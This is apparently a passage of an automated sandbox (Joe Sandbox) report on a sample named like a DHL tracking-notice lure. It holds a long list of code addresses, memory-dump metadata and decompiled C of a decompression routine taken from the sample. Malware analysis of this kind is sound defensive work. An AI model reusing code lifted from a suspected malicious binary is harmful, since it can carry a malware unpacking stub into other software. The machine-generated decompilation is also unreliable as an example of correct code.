                    0x00405f49
                    0x00405f71
                    0x00405f73
                    0x00405f81
                    0x00405f81
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f75
                    0x00405f75
                    0x00405f78
                    0x00405f79
                    0x00405f79
                    0x00000000
                    0x00405f75
                    0x00405f4f
                    0x00405f54
                    0x00405f54
                    0x00405f5d
                    0x00405f65
                    0x00405f68
                    0x00000000
                    0x00405f6e
                    0x00405f6e
                    0x00000000
                    0x00405f6e
                    0x00000000
                    0x00405f8b
                    0x00405f8b
                    0x00405f8f
                    0x0040683b
                    0x00000000
                    0x0040683b
                    0x00405f98
                    0x00405fa8
                    0x00405fab
                    0x00405fae
                    0x00405fae
                    0x00405fae
                    0x00405fb1
                    0x00405fb5
                    0x00000000
                    0x00000000
                    0x00405fb7
                    0x00405fbd
                    0x00405fe7
                    0x00405fed
                    0x00405ff4
                    0x00000000
                    0x00405ff4
                    0x00405fc3
                    0x00405fc6
                    0x00405fcb
                    0x00405fcb
                    0x00405fd6
                    0x00405fde
                    0x00405fe1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406026
                    0x0040602c
                    0x0040602f
                    0x0040603c
                    0x00406044
                    0x00000000
                    0x00000000
                    0x00405ffb
                    0x00405ffb
                    0x00405fff
                    0x0040684a
                    0x00000000
                    0x0040684a
                    0x0040600b
                    0x00406016
                    0x00406016
                    0x00406016
                    0x00406019
                    0x0040601c
                    0x0040601f
                    0x00406024
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040604c
                    0x0040604e
                    0x00406051
                    0x004060c2
                    0x004060c5
                    0x004060c8
                    0x004060cf
                    0x004060d9
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00406053
                    0x00406057
                    0x0040605a
                    0x0040605c
                    0x0040605f
                    0x00406062
                    0x00406064
                    0x00406067
                    0x00406069
                    0x0040606e
                    0x00406071
                    0x00406074
                    0x00406078
                    0x0040607f
                    0x00406082
                    0x00406089
                    0x0040608d
                    0x00406095
                    0x00406095
                    0x00406095
                    0x0040608f
                    0x0040608f
                    0x0040608f
                    0x00406084
                    0x00406084
                    0x00406084
                    0x00406099
                    0x0040609c
                    0x004060ba
                    0x004060bc
                    0x00000000
                    0x0040609e
                    0x0040609e
                    0x004060a1
                    0x004060a4
                    0x004060a7
                    0x004060a9
                    0x004060a9
                    0x004060a9
                    0x004060ac
                    0x004060af
                    0x004060b1
                    0x004060b2
                    0x004060b5
                    0x00000000
                    0x004060b5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406355
                    0x00406359
                    0x0040637c
                    0x0040637f
                    0x00406382
                    0x0040638c
                    0x0040635b
                    0x0040635b
                    0x0040635e
                    0x00406361
                    0x00406364
                    0x00406371
                    0x00406374
                    0x00406374
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00000000
                    0x00406398
                    0x0040639c
                    0x00000000
                    0x00000000
                    0x004063a2
                    0x004063a6
                    0x00000000
                    0x00000000
                    0x004063ac
                    0x004063ae
                    0x004063b2
                    0x004063b2
                    0x004063b5
                    0x004063b9
                    0x00000000
                    0x00000000
                    0x00406409
                    0x0040640d
                    0x00406414
                    0x00406417
                    0x0040641a
                    0x00406424
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x004066b8
                    0x0040640f
                    0x00000000
                    0x00000000
                    0x00406430
                    0x00406434
                    0x0040643b
                    0x0040643e
                    0x00406441
                    0x00406436
                    0x00406436
                    0x00406436
                    0x00406444
                    0x00406447
                    0x0040644a
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00406453
                    0x00406453
                    0x00406456
                    0x0040645d
                    0x00406462
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00406343
                    0x00406343
                    0x00406346
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00000000
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x004066b8
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x00000000
                    0x00406776
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00406734
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00406734
                    0x00406734
                    0x00000000
                    0x0040673a
                    0x00406734
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00406734
                    0x004066bb
                    0x004066b8
                    0x00000000
                    0x004062ef

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                    • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                    • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                    • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406409 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
